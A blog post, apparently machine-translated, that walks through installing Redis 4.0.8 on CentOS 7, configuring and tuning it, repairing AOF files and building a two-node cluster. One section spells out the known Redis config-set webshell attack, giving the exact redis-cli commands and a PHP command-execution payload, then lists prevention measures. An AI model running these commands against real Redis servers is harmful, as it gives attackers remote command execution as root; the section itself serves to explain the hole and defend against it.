CentOS7.X installs Redis-4.0.8 and builds Redis clusters

Posted by chrisv on Tue, 17 Mar 2020 12:24:00 +0100

My personal website

Install redis

  1. Preparation before installation

    yum install \
vim \
wget \
make \
gcc \
gcc-c++ \
automake \
autoconf \
-y \

  2. Download, unzip and install

    cd /root
wget http://download.redis.io/releases/redis-4.0.8.tar.gz
tar -zxzf redis-4.0.8.tar.gz
cd redis-4.0.8
make PREFIX=/usr/local/redis/ install

  3. Create the data file storage location required in the configuration

    mkdir /data
mkdir /data/redis
mkdir /usr/local/redis/log

  4. Add modify profile Reference configuration

    cp ./redis.conf /usr/local/redis
vim /usr/local/redis/redis.conf

# IP binding
bind 127.0.0.1 192.168.0.111
# Protection mode (the opening condition is that redis can communicate with each other and cluster cannot be opened)
protected-mode yes
# Access port
port 6379
# Connection timeout, unit S, 0 is disable timeout
timeout 0
# Run as Daemons
daemonize yes
# Data file path
dir /data/redis
# Path to process ID file
pidfile /usr/local/redis/log/redis.pid
# log file path
logfile /usr/local/redis/log/redis.log
# Open key expiration delete notification
notify-keyspace-events Ex

ESC
:wq

# The following security configuration options are for reference only
    # Disable some dangerous orders
    rename-command FLUSHALL ""
    rename-command CONFIG   ""
    rename-command EVAL     ""
    # Add access password
    requirepass ********
    # IP binding native
    bind 127.0.0.1

  5. performance optimization

    # Edit / etc/rc.local
vim /etc/rc.local

echo never > /sys/kernel/mm/transparent_hugepage/enabled

ESC
:wq

# Add / etc/rc.local execution permission
chmod +x /etc/rc.d/rc.local

# Edit / etc/sysctl.conf
vim /etc/sysctl.conf

vm.overcommit_memory = 1
net.core.somaxconn = 1024

ESC
:wq

# Immediate solution
echo never > /sys/kernel/mm/transparent_hugepage/enabled
echo 1024 > /proc/sys/net/core/somaxconn
sysctl vm.overcommit_memory=1
sysctl -p

  6. Modify directory ownership

    useradd -s /sbin/nologin -M redis
chown -R redis:redis /data/redis
chown -R redis:redis /usr/local/redis

  7. Start redis and set power on

    # Enter the unit file directory
cd /etc/systemd/system

# Create a redis cell file in the format of [cell file name]. [cell file type]
vim redis.service

[Unit]
Description=Start redis on boot.
After=default.target network.target

[Service]
User=redis
Group=redis
Type=forking
PIDFile=/usr/local/redis/log/redis.pid
ExecStart=/usr/local/redis/bin/redis-server /usr/local/redis/redis.conf
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=false
Restart=always

[Install]
WantedBy=multi-user.target

ESC
:wq

# Modify the file permission so that only root can edit the file
chown -R root:root /etc/systemd/system/redis.service
chmod -R 644 /etc/systemd/system/redis.service

# Update systemd
systemctl daemon-reload
systemctl enable redis
systemctl start redis

  8. Store data

    /usr/local/redis/bin/redis-cli -h 127.0.0.1

set num 123
save
get num
quit

  9. Batch delete matching rule data

    Redis cli keys [matching rule] | xargs redis cli del

Redis downtime aof file corruption start failed

  1. Copy aof file

  2. Repair damaged aof files

    Redis check AOF -- fix [AOF filename]
  3. Restart Redis

The exploitation of Redis vulnerability webshell

Reference link

  1. Redis uses the following principles for this vulnerability

    1. Redis native supports' redis cli > config set 'without restarting the redis service
      Next, modify the configuration of dir and dbfilename dynamically;
    2. If 'dir /www /' and 'dbfilename test.php' are specified in the redis configuration, the
      When the save command is executed, a datastore file test.php will be generated in the directory / www /

    File is a binary file, but its content contains the value of the saved data, if / www / directory is web
    Directory, then / www/test.php will be used as the entry to your server;

  2. Examples of loopholes (this is a negative textbook)

    1. redis runs as root
    2. Nginx starts as root, and the subprocesses run as root

    3. The web server is nginx and configured as follows:

      server {
    listen       x;
    server_name  xxx.xxx.com;
    root         /www;

    location / {
        index    index.php index.html index.htm;
    }

    location ~ \.php$ {
        fastcgi_index  index.php;
        fastcgi_pass   127.0.0.1:9000;
        fastcgi_param  SCRIPT_NAME      $fastcgi_script_name;
        fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
        include        fastcgi_params;
    }
}

    4. The following command is executed through redis cli

      config set dir /www/
config set dbfilename test.php
set test "<?php exec($_GET['cmd']); ?>"
save

    5. And then something terrible happened

      1. Under the / www / directory, there is the test.php file, which can be accessed through the http://xxx.xxx.com/test.php Visit to
      2. If you visit now http://xxx.xxx.com/test.php?cmd=xxx, Then xxx will be executed as root (xxx is any linux command)

Prevention of Redis vulnerability webshell

  1. Do not use redis's web management tools online
  2. redis runs as a low privilege user (unexpected user name such as rediser)
  3. redis can only be accessed through the local and intranet (bind 127.0.0.1 192.168.0.12/24)
  4. redis disable config command (rename command config can be disabled in the configuration file)
  5. The web service subprocess runs as a low privileged user (because the user running webshell is a subprocess of the web service)

redis cluster

  1. Configuration before cluster (single machine two service test 63796380)

    #Intranet IP:192.168.0.100

  2. Modify redis.conf

    vim /usr/local/redis/redis.conf

# Enable cluster
cluster-enabled yes
# Call cluster profile
cluster-config-file nodes-6379.conf
# Cluster timeout
cluster-node-timeout 15000
# Shut down all downtime
cluster-require-full-coverage no
# Number of cluster subordinate elements
cluster-slave-validity-factor 10
# Minimum migration value of slave number (master must have at least two slaves before slave migration)
cluster-migration-barrier 1

ESC
:wq

  3. Profile add

    yum install ruby
gem install redis

cp /usr/local/redis/redis.conf /usr/local/redis/redis.conf.backup
cp /usr/local/redis/redis.conf /usr/local/redis/redis-6379.conf
cp /usr/local/redis/redis.conf /usr/local/redis/redis-6380.conf

mkdir /usr/local/redis/data/6379
mkdir /usr/local/redis/data/6380

  4. Modify redis-6379.conf

    vim /usr/local/redis/redis-6379.conf

unixsocket /usr/local/redis/data/6379/redis.sock
pidfile /usr/local/redis/log/redis_6379.pid
logfile /usr/local/redis/log/redis_6379.log
dir /usr/local/redis/data/6379/
bind 192.168.0.100
port 6379

ESC
:wq

  5. Modify redis-6380.conf

    vim /usr/local/redis/redis-6380.conf

unixsocket /usr/local/redis/data/6380/redis.sock
pidfile /usr/local/redis/log/redis_6380.pid
logfile "/usr/local/redis/log/redis_6380.log"
dir /usr/local/redis/data/6380/
bind 192.168.0.100
port 6380

ESC
:wq

  6. Modify startup

    vim /etc/rc.local

/usr/local/redis/bin/redis-server /usr/local/redis/redis-6379.conf
/usr/local/redis/bin/redis-server /usr/local/redis/redis-6380.conf

ESC
:wq

  7. Create cluster

    cd /root/redis/src/
# view help
./redis-trib.rb help
# Add bindings
./redis-trib.rb create --replicas 1 192.168.0.100:6379 192.168.0.100:6380

  8. Cluster testing

    /usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 -c

  9. Normal shutdown (do not force shutdown)

    /usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 shutdown
  10. Alipay red envelopes support authors

Topics: Operation & Maintenance Redis PHP vim yum

Hot Topics

©2024 Programmer Think